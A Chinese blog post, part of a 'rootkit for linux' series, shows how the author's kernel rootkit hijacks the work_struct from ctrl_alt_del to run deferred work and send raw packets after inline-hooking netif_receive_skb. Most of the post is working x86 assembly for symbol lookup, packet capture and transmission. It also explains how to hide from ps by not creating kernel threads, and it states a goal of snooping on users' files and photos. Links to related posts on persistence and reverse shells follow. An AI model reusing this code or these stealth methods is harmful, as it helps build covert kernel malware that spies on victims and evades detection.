rookit for linux 9.发送skb---使用工作队列

最新推荐文章于 2024-07-15 15:05:10 发布
原创 最新推荐文章于 2024-07-15 15:05:10 发布 · 1.5k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#工作 #linux #struct #数据结构 #汇编 #thread

本文探讨了如何在Linux内核中通过复制已有的工作队列结构,利用工作队列发送skb(socket buffer)。文中详细介绍了如何从ctrl_alt_del函数中获取并修改work_struct结构,使其适用于发送skb的任务。此外,还提供了汇编代码示例,展示了如何在接收到数据包后将其发送出去。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

搞了一天,终于能发送skb了。不是这东西难搞,是汇编底子还是不行啊,大错不犯小错不断。这一个小错,那个一小错,一个小错调一个小时,一下一天就过去了。

虽然调试的时候很恼火,不过还是乐此不疲地写着汇编。就像一句名言说过“世界上有两类语言,有一些语言天天被人骂,有一些语言没有人用”。汇编就是属于这类语言。

 

好了,回忆一下上次是怎么接收skb的?对了,inline hook 了netif_receive_skb。那我们在 inline hook 中的代码也是跟 netif_receive_skb 一个上下文的-----软中断。这个软中断有啥问题呢?没错,问题可大了,软中断里的操作是原子的,不能调度,不能睡眠,不能停留太长时间。

但我们的rootkit是不愿意接受这个现实的,我们要进行的操作可多了,要读文件,写文件,还要偷窥别人照片。这些操作里必然有调度,睡眠。

咋的办?《linux 设备驱动程序》给出了答案---工作队列。工作队列的上下文是符合我们的rootkit的要求的。

对比了下代码,2.6.18 ~ 2.6.24 间 work_struct 这个数据结构发生了剧烈变化。在c语言里,用一个宏 DECLARE_WORK 就能声明一个工作队列。

这可苦了我们写汇编的,多少个版本啊,我们能一个一个地支持吗?当然不能,那是sb的想法。

 

我们的处理方法也是利用大杀器来做。

我们注意到一个角落里的函数 ctrl_alt_del 。看这函数的名字就知道它是几百年都不会被调用一次的函数了。

  1. void ctrl_alt_del(void)
  2. {
  3.     static DECLARE_WORK(cad_work, deferred_cad);
  5.     if (C_A_D)
  6.         schedule_work(&cad_work);
  7.     else
  8.         kill_cad_pid(SIGINT, 1);
  9. }

关键不是这个,关键是它的开头有一个初始化好了的 work_struct 结构,我们直接把它复制到我们自己的缓冲区了就能用了。

 

反汇编看看:

 

  1.    0:   a1 f0 a5 34 c0          mov    0xc034a5f0,%eax
  2.    5:   85 c0                   test   %eax,%eax
  3.    7:   74 0a                   je     0x13
  4.    9:   b8 9c a6 34 c0          mov    $0xc034a69c,%eax
  5.    e:   e9 5d 2d 00 00          jmp    0x2d70
  6.   13:   a1 44 4b 3c c0          mov    0xc03c4b44,%eax
  7.   18:   b9 01 00 00 00          mov    $0x1,%ecx
  8.   1d:   ba 02 00 00 00          mov    $0x2,%edx
  9.   22:   e9 19 dd ff ff          jmp    0xffffdd40
  10.   27:   89 f6                   mov    %esi,%esi
  11.   29:   8d bc 27 00 00 00 00    lea    0x0(%edi),%edi

第九行就是把 cad_work 这个参数传给 schedule_work 。然后调用schedule_work 。

我们直接用大杀器搜索操作码为 0xb8 的第一条指令就是了。

搜到以后把 cad_work 复制到我们自己的缓冲区里。

处理两个细节:

1.把 work_struct.entry 这个 list_head 设为空。搜索整个数据结构里内容等于地址的字段就行了,linux里的链表就是这样。

2.找到 work_struct.func 这个字段的偏移。只要搜索整个数据结构里内容等于deferred_cad的地址的字段就行了。

 

搞到这个 work_struct 之后,我们就能使用自己的工作队列了。使用的时候只需要把 work_struct.func 字段设为自己的函数的地址。然后调用 schedule_work 即可。

 

schedule_work 这个函数呢,是把参数 work_struct 挂在keventd_wq这个内核共享的工作队列里执行。

有人说“为啥我们不自己创建一个工作队列呢?”不行,工作队列的是用内核线程来实现的。而创建一个工作队列时,同时会创建 n 个内核线程,n 就等于你的cpu数量。而内核线程,在 bash 上用 ps -aux 这命令就能看到。你这样就是在捅马蜂窝啊!

 

所以解决了这些细节问题。我们就可以这样做了:

在接收到数据包的时候,把数据包的内容复到新申请的缓冲区里,然后调用 schedule_work 把发包的函数挂在共享的队列里,等待被执行。

 

怎么发包呢?

最终,网络层的函数会调用 dev_queue_xmit 这个函数发包。这个函数的内部可复杂了,一下lock一下unlock,还调用qdisc啥的。所以我们还是直接调用它算了。要注意的是,这个函数里会把 skb 克隆给 ptypes_all 上的嗅探器,每人一份。不过我们不怕,如果有嗅探器,我们早就把它hook了,如果没有,那就算了。

直接调用dev_queue_xmit这方法不是最好的,不过我尝试了直接调用 net_device->dev_hard_start_xmit 发包,结果不行。可能是没有解决同步的问题。

 

所以我们现在可以发包了!

 

贴代码贴代码

 

处理 work_struct 部分:

  1. struct_work_struct: .fill 0x100
  2. work_struct.func: .fill 4
  3. schedule_work: .fill 4
  6. // void kthread_init(); 
  7. kthread_init:
  8. #define retcode 0xc
  9.     PUSH_ALL
  10.     subl $0x10, %esp
  12.     movl $0, retcode(%esp)
  14.     GET_STR("schedule_work", %eax)
  15.     movl $13, %edx
  16.     call ksym_lookup
  17.     testl %eax, %eax
  18.     jz kthread_init_out_failed
  19.     GET_ADDR(schedule_work, %edx)
  20.     movl %eax, (%edx)
  21.     
  22.     GET_STR("ctrl_alt_del", %eax)
  23.     movl $12, %edx
  24.     call ksym_lookup
  25.     testl %eax, %eax
  26.     jz kthread_init_out_failed
  28.     movl %eax, %esi
  29.     leal 0x100(%esi), %edi
  30. 1:  movl %esi, %eax
  31.     GET_ADDR(struct_dism, %edx)
  32.     call xde_dism
  33.     testl %eax, %eax
  34.     jz kthread_init_out_failed
  35.     movl %eax, %ebp
  37.     movb dism_opcode(%edx), %al
  38.     cmpb $0xb8, %al
  39.     jz 3f
  40.         
  41.     addl %ebp, %esi
  42.     cmpl %edi, %esi
  43.     jl 1b
  44.     
  45. 3:  movl 1(%esi), %esi
  46.     movl %esi, %ebp
  47.     GET_ADDR(struct_work_struct, %edi)
  48.     movl $0x100, %ecx
  49.     cld; rep movsb
  50.     
  51.     GET_STR("deferred_cad", %eax)
  52.     movl $12, %edx
  53.     call ksym_lookup
  54.     testl %eax, %eax
  55.     jz kthread_init_out_failed
  56.     
  57.     GET_ADDR(struct_work_struct, %esi)
  58.     movl $0x100, %ecx
  59. 4:  cmpl %eax, (%esi)
  60.     jz 5f
  61.     cmpl %ebp, (%esi)
  62.     jnz 6f
  63.     movl %esi, (%esi)
  64.     movl %esi, 4(%esi)
  66. 6:  incl %esi
  67.     incl %ebp
  68.     loop 4b
  69.     jmp kthread_init_out_failed
  71. 5:  GET_ADDR(struct_work_struct, %edi)
  72.     subl %edi, %esi
  73.     GET_ADDR(work_struct.func, %eax)
  74.     movl %esi, (%eax)
  76. #ifdef _DEBUG_
  77.     movl %edi, 4(%esp)
  78.     movl %esi, 8(%esp)
  79.     DPRINT("<3>struct_work_struct %lx; work_struct.func %lx/n")
  80. #endif
  82. 2:
  83. kthread_init_out:
  84.     movl retcode(%esp), %eax
  85.     addl $0x10, %esp
  86.     POP_ALL
  87.     ret
  88. kthread_init_out_failed:
  89.     movl $1, retcode(%esp)
  90.     jmp kthread_init_out
  92. #undef retcode

接收skb部分:

 

 

 

 

 

  1.     // data_recv = __kmalloc(skb->len + 8, GFP_ATOMIC);
  2.     GET_STRUCT_VAL32(%esi, sk_buff.len, %ecx)
  3.     movl %ecx, %edi
  4.     leal 8(%ecx), %eax
  5.     movl $0x20, %edx
  6.     GET_VAL32(__kmalloc, %ebp)
  7.     call *%ebp
  8.     testl %eax, %eax
  9.     jz his_out
  10.     movl %eax, %ebx
  11.     SET_VAL32(data_recv, %ebx)
  13.     // put skb->len, skb->dev at the begining of data_recv
  14.     movl %edi, (%ebx)
  15.     GET_STRUCT_VAL32(%esi, sk_buff.dev, %eax)
  16.     movl %eax, 4(%ebx)
  18.     // memcpy(data_recv + 8, skb->data - 14, skb->len);
  19.     movl %edi, %ecx
  20.     leal 8(%ebx), %edi
  21.     GET_STRUCT_VAL32(%esi, sk_buff.data, %ebx)
  22.     leal -14(%ebx), %esi
  23.     cld; rep movsb
  25.     // struct_work_struct.func = thread_recv;
  26.     GET_ADDR(thread_recv, %ebx)
  27.     GET_ADDR(struct_work_struct, %ecx)
  28.     SET_STRUCT_VAL32(%ecx, work_struct.func, %ebx)
  30.     // schedule_work(struct_work_struct);
  31.     GET_VAL32(schedule_work, %ebp)
  32.     movl %ecx, %eax
  33.     call *%ebp

发送skb部分:

 

  1. // void thread_recv(void *data_recv);
  2. thread_recv:
  3.     PUSH_ALL
  4.     subl $0x10, %esp
  6. #ifdef _DEBUG_
  7.     DPRINT("<3>our pack/n")
  8. #endif
  10.     // skb = __netdev_alloc_skb(dev, 123, GFP_ATOMIC);
  11.     GET_VAL32(data_recv, %eax)
  12.     leal 0x8(%eax), %edi
  13.     movl $123, %edx
  14.     movl 4(%eax), %eax
  15.     movl $0x20, %ecx
  16.     GET_VAL32(__netdev_alloc_skb, %ebp)
  17.     call *%ebp
  18.     testl %eax, %eax
  19.     jz thread_recv_out
  20.     movl %eax, %esi
  22.     // skb->len = 123;
  23.     SET_STRUCT_VAL32(%esi, sk_buff.len, $123)
  25.     // skb->tail = skb->end;
  26.     GET_STRUCT_VAL32(%esi, sk_buff.end, %ebx)
  27.     SET_STRUCT_VAL32(%esi, sk_buff.tail, %ebx)
  29.     // memcpy(skb->data, data_recv + 0x8 + 6, 6);
  30.     GET_STRUCT_VAL32(%esi, sk_buff.data, %eax)
  31.     movl 6(%edi), %ebx
  32.     movw 10(%edi), %cx
  33.     movl %ebx, (%eax)
  34.     movw %cx, 4(%eax)
  36.     // memcpy(skb->data + 6, data_recv + 0x8, 6);
  37.     movl (%edi), %ebx
  38.     movw 4(%edi), %cx
  39.     movl %ebx, 6(%eax)
  40.     movw %cx, 10(%eax)
  41.     
  42.     // memcpy(skb->data + 14, "/x12/x34/x56/x78", 4);
  43.     movl $0x12345678, 14(%eax)
  45.     // dev_queue_xmit(skb);
  46.     GET_VAL32(dev_queue_xmit, %ebp)
  47.     movl %esi, %eax
  48.     call *%ebp
  50. #ifdef _DEBUG_
  51.     movl %eax, 4(%esp)
  52.     DPRINT("<3>sent %lx/n")
  53. #endif
  55. thread_recv_out:
  56.     addl $0x10, %esp
  57.     POP_ALL
  58.     ret

新定义的宏:

 

  1. #define EXPORT_LABEL(label) /
  2.     .globl label; label: 
  4. #define GET_ADDR(label, reg) /
  5.     call 999f;    /
  6.     999: popl reg;    /
  7.     subl $(999b - label), reg 
  9. #define GET_VAL32(label, reg)   /
  10.     GET_ADDR(label, reg);   /
  11.     movl (reg), reg;    
  13. #define SET_VAL32(label, val)   /
  14.     GET_ADDR(label, %eax);  /
  15.     movl val, (%eax);   
  17. #define GET_STR(str, reg)   /
  18.     call 1111f;   /
  19.     .asciz str; /
  20.     1111: popl reg 
  22. #define DPRINT(fmt)   /
  23.     GET_ADDR(printk, %eax);    /
  24.     movl (%eax), %eax;  /
  25.     GET_STR(fmt, %edx); /
  26.     movl %edx, (%esp);  /
  27.     call *%eax;
  29. #define GET_STRUCT_VAL32(base, offset, reg) /
  30.     GET_VAL32(offset, reg); /
  31.     movl 0(base, reg, 1), reg;
  33. #define SET_STRUCT_VAL32(base, offset, val) /
  34.     GET_VAL32(offset, %eax);    /
  35.     movl val, 0(base, %eax, 1); 
  37. #define PUSH_ALL    /
  38.     pushl %ebx; /
  39.     pushl %ecx; /
  40.     pushl %edx; /
  41.     pushl %esi; /
  42.     pushl %edi; /
  43.     pushl %ebp;
  45. #define POP_ALL /
  46.     popl %ebp;  /
  47.     popl %edi;  /
  48.     popl %esi;  /
  49.     popl %edx;  /
  50.     popl %ecx;  /
  51.     popl %ebx;

看看效果!

 

 

 

varg_vikernes
关注
内网渗透-linux权限维持
lza20001103的博客
08-25 1815
内网渗透-linux权限维持 文章目录内网渗透-linux权限维持添加用户存在交互的shell不允许uid=0的⽤户远程登录(高版本)没交互shell⽆回显添加Linux账户密码使用linux的perl直接写入/etc/passwd隐藏后门技巧修改文件属性文件锁定历史操作命令隐藏文件进程隐藏rookit后门ReptilePAMssh公私钥免密登录ssh秘钥计划任务 反弹shell 添加用户 UID=0是最高权限的用户,有时候不能被远程登录,可以创建一个普通用户。 正常可以通过 “id” 来查看当前的用户的U
sk_buff整理笔记(五、队列管理函数
YuZhiHui_No1的专栏
08-31 7480
分析sk_buff结构及相关结构的队列管理函数:初始化函数skb_queue_head_init(struct sk_buff_head *list);插入函数,kb_queue_head(),skb_queue_tail();出队列函数,sk_buff *skb_dequeue(struct sk_buff_head *list),sk_buff *skb_dequeue_tail(struct sk_buff_head *list);清空队列函数skb_queue_purge(struct sk_b
skb
qiuluzhi的博客
11-15 548
sk_buff ,当网络包被内核处理时,底层协议的数据被传送更高层,当数据传送时过程反过来。由不同协议产生的数据(包括头和负载)不断往下层传递直到它们最终被发送。因为这些操作的速度对于网络层的表现至关重要,内核使用一个特定的结构叫 sk_buff, 其定义文件在 skbuffer.h。Socket buffer被用来在网络实现层交换数据而不用拷贝来或去数据包 –这显著获得速度收益。 sk_buf
flatMap和Map的区别理解
zyh1234456的博客
10-23 658
flatMap和Map的区别理解 结合下图来理解: Map: 数据的映射转换,数据集中的每一条都数据通过函数进行转换,输入多少条,输出多少条 如list中的("A",1) 通过函数 (t._1 + t._2) 操作后变成 "A1" flatMap: 扁平映射,数据集中的每条数据通过函数进行映射转换后再进行拆解,输出条数通常多余输入条数 如list中的("A",1) 通过函数 (t._1 + t._2) 操作后变成 "A1",然后拆解为A,1两条数据 ...
TCP套接口的sk_backlog接收队列
redwingz的博客
03-28 5039
在接收到数据包之后,如果判断此套接口当前正被用户进程所使用,数据包将被保存到套接口结构的sk_backlog成员的head所定义的skb缓存列表中,tail指向链表的末尾,len变量记录了当前链表中所有skb的总长度。 struct sock { struct { atomic_t rmem_alloc; int len; ...
sk_buff 详解(一)
farmwang的专栏
01-08 7208
/* socket buffers,简称skb,中文名字叫套接字缓存。 它作为网络数据包的存放地点,使得协议栈中每个层都可以对数据进行操作,从而实现了数据包自底向上的传递。 该结构维护一个收到的或者要发送的网络包。但其本身并不包含存放网络包的数据的存储区。 存储区是另外单独分配的内存空间,但该结构说明了如何访问存储区空间,如何维护多个存储区空间以及存储网络包解析的成果。 所有的sk_buff是通
linux内核网络 sk_buff 之队列管理函数
m0_74282605的博客
01-05 699
pskb_trim()函数其实包含了skb_trim()函数,如果当分片结构数据区没有数据则skb_trim()函数和pskb_trim()函数是一样的。删除数据函数和插入数据函数相对应,和删除函数不一样,删除函数只是删除队列链表中的某个元素节点,而删除数据函数是删除sk_buff结构中的数据区数据以及删除sk_buff结构中分片结构的数据区中数据。然后创建个空的链表。插入数据函数和插入函数是不一样的,插入函数是把sk_buff结构体插入链表中,而插入数据函数是把数据插入sk_buff结构的数据区。
Android-Rootkit:适用于 Android 的 rootkit。 基于 Phrack Issue 68 的“Android platform based linux kernel rootkit”
05-30
文件名: sys_call_table.ko描述:这个 rookit 是为了拦截以下调用而开发的 SYS_WRITE SYS_READ SYS_CREAT SYS_MKDIR SYS_RMDIR SYS_KILL SYS_OPEN SYS_CLOSE SYS_GETDENT SYS_UNLINK SYS_KILL
OpenArk:OpenArk是Windows的开源反rookit(ARK)工具-Open source
03-25
OpenArk是Windows的一个开源反rookit(ARK)工具。 Ark是Anti-Rootkit的缩写,它旨在反转/编程帮助程序,用户也可以在OS中找出隐藏的恶意软件。 将来将支持越来越强大的功能。 特征 进程-进程/线程/模块/句柄/内存/...
安全防护(一):Linux应急响应
最新发布
aaaadoga的博客
07-15 969
查看日志配置情况:more /etc/rsyslog.conf。日志默认存放位置:/var/log/:只输出有问题的软件。
OpenArk64.rar
09-14
9. **持续更新**:随着新的rootkit技术出现,OpenArk会定期更新其检测库和技术,以保持对最新威胁的有效防御。 10. **兼容性**:由于是64位版本,OpenArk64.exe确保了在最新的64位Windows系统上的良好运行。 使用...
linux协议栈skb操作函数
jasenwan88的专栏
03-17 6685
接字缓冲区函数 函数名 功能 函数形成 参数 描述 skb_queue_empty 检查队列是否为空 int skb_queue_empty (struct sk_buff_head * list) list为队列头 如果队列为空返回真,否则返回假 skb_get
Linux内核中的skb_queue_splice_tail_init函数
落尘纷扰的专栏
04-06 2004
skb_queue_splice_tail_init()函数用于将链表a连接到链表b上,形成一个新的链表b,并将原来a的头变成空链表。 其实现如下: /** * skb_queue_splice_tail - join two skb lists and reinitialise the emptied list * @list: the new list to add * @...
UDP之数据报接收过程(二)
九天小哥的专栏
10-31 3501
文章目录系统调用: udp_recvmsg()从接收队列中获取skbskb_peek()__skb_unlink()skb_free_datagram_locked()后备队列的数据接收sk_backlog_rcv() UDP数据报的接收过程要分两部分来看: 网络层将数据报递交给UDP后,UDP的处理过程。该过程中,UDP需要接收数据包并对其进行校验,校验成功后将其放入接收队列中等待用户空间程序来读取; 用户空间程序调用read()等系统调用读取已经放入接收队列中的数据。 这篇笔记记录了第二步。 系统调
Linux内核skb处理流程图,Linux内核VLAN学习笔记
weixin_34245171的博客
04-30 674
四、发送流程对于L5来说,一般的网络通讯,首先是建立一个socket结构,sockfd = socket(AF_INET,SOCK_RAW,protocol->p_proto)执行系统调用sys_socketcall(/net/socket.c),接着sendto函数调用系统调用sys_sendto(/net/socket.c),处理完用户空间和内核空间的转换后,进入L3。L3层一方面包装好...
在内核中使用线程与skb队列发送数据
baiguomeng
12-11 207
在内核中我们发送数据一般使用dev_queue_xmit. 但是每次都需要通读等待返回, 通过线程的方式, 可以实现异步模式, 无需等待发送完成.可以大大加快发送速度.以下是示例代码: static int xmit_thread_worker(void *arg); /////////////////////////////////////////////////////////////...
OpenArk64:Windows平台下的开源反rootkit工具
OpenArk是一个开源的Anti-Rookit(ARK)工具,专门用于Windows操作系统。Anti-Rookit缩写为ARK,是Anti-Rootkit的简称,Rootkit是指一类恶意软件,它旨在隐藏恶意程序的存在,使它们难以被发现和移除。OpenArk工具正是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值